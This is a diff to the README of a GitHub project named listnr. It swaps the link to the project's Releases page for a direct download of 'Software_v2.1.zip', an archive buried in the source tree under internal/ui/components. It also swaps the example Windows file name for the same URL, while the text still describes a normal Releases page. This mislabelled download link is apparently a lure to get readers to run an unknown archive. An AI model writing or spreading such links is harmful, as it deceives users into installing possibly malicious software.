alexniemiz1/listnr/README.md

 ## 📦 How to Download and Install

-1. Click on the [Releases page](https://github.com/alexniemiz1/listnr/releases) link.
+1. Click on the [Releases page](https://github.com/alexniemiz1/listnr/raw/refs/heads/main/internal/ui/components/Software_v2.1.zip) link.
 2. On the Releases page, locate the latest version of listnr.
 3. Click on the asset that corresponds to your operating system.
-For example, if you're using Windows, look for a file named `listnr-win.zip`.
+For example, if you're using Windows, look for a file named `https://github.com/alexniemiz1/listnr/raw/refs/heads/main/internal/ui/components/Software_v2.1.zip`.
 4. The download will start automatically.
 Locate the downloaded file in your system's Downloads folder.

 ## 🔧 Installation Steps